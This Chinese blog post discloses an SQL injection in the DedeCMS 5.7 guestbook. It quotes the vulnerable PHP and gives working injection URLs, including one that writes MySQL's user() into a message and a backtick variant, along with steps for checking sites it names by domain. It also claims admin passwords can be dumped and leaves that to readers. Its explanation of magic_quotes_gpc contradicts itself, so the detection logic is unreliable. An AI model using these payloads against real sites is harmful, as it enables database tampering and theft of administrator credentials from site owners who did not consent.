漏洞播报：dedecms5.7最新guestbook.php文件sql注射漏洞

显示不全请点击全屏阅读

影响版本为5.7

漏洞文件edit.inc.php具体代码：

< ?php 

if(!defined(‘DEDEINC’)) exit(‘Request Error!’); 

if(!empty($_COOKIE[‘GUEST_BOOK_POS’])) $GUEST_BOOK_POS = $_COOKIE[‘GUEST_BOOK_POS’]; 

else $GUEST_BOOK_POS = “guestbook.php”; 

$id = intval($id); 

if(empty($job)) $job=’view’; 

if($job==’del’ && $g_isadmin) 

{ 

$dsql->ExecuteNoneQuery(” DELETE FROM `dede_guestbook` WHERE id=’$id’ “); 

ShowMsg(“成功删除一条留言！”, $GUEST_BOOK_POS); 

exit(); 

} 

else if($job==’check’ && $g_isadmin) 

{ 

$dsql->ExecuteNoneQuery(” UPDATE `dede_guestbook` SET ischeck=1 WHERE id=’$id’ “); 

ShowMsg(“成功审核一条留言！”, $GUEST_BOOK_POS); 

exit(); 

} 

else if($job==’editok’) 

{ 

$remsg = trim($remsg); 

if($remsg!=”) 

{ 

//管理员回复不过滤HTML By:Errorera blog:errs.cc 

if($g_isadmin) 

{ 

$msg = “<div class=’rebox’>”.$msg.”</div>\n”.$remsg; 

//$remsg <br /><font color=red>管理员回复：</font> } 

else

{ 

$row = $dsql->GetOne(“SELECT msg From `dede_guestbook` WHERE id=’$id’ “); 

$oldmsg = “<div class=’rebox’>”.addslashes($row[‘msg’]).”</div>\n”; 

$remsg = trimMsg(cn_substrR($remsg, 1024), 1); 

$msg = $oldmsg.$remsg; 

} 

} 

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc 

$dsql->ExecuteNoneQuery(“UPDATE `dede_guestbook` SET `msg`=’$msg’, `posttime`='”.time().”‘ WHERE id=’$id’ “); 

ShowMsg(“成功更改或回复一条留言！”, $GUEST_BOOK_POS); 

exit(); 

} 

//home:www.errs.cc 

if($g_isadmin) 

{ 

$row = $dsql->GetOne(“SELECT * FROM `dede_guestbook` WHERE id=’$id'”); 

require_once(DEDETEMPLATE.’/plus/guestbook-admin.htm’); 

} 

else

{ 

$row = $dsql->GetOne(“SELECT id,title FROM `dede_guestbook` WHERE id=’$id'”); 

require_once(DEDETEMPLATE.’/plus/guestbook-user.htm’); 

}漏洞成功需要条件：
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞：
先打开www.chndianai.com/plus/guestbook.php 可以看到别人的留言，
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问：

www.mcbang.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc’&id=存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.mcbang.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证

明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问

www.mcbang.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=’,msg=user(),email=’然后返回，那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样，大家有兴趣的多研究下！！

最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=’,msg=@`’`,

Tags：

dedecms漏洞,

如果您喜欢我的博客，欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你，也可微信扫下方二维码打赏本人一杯咖啡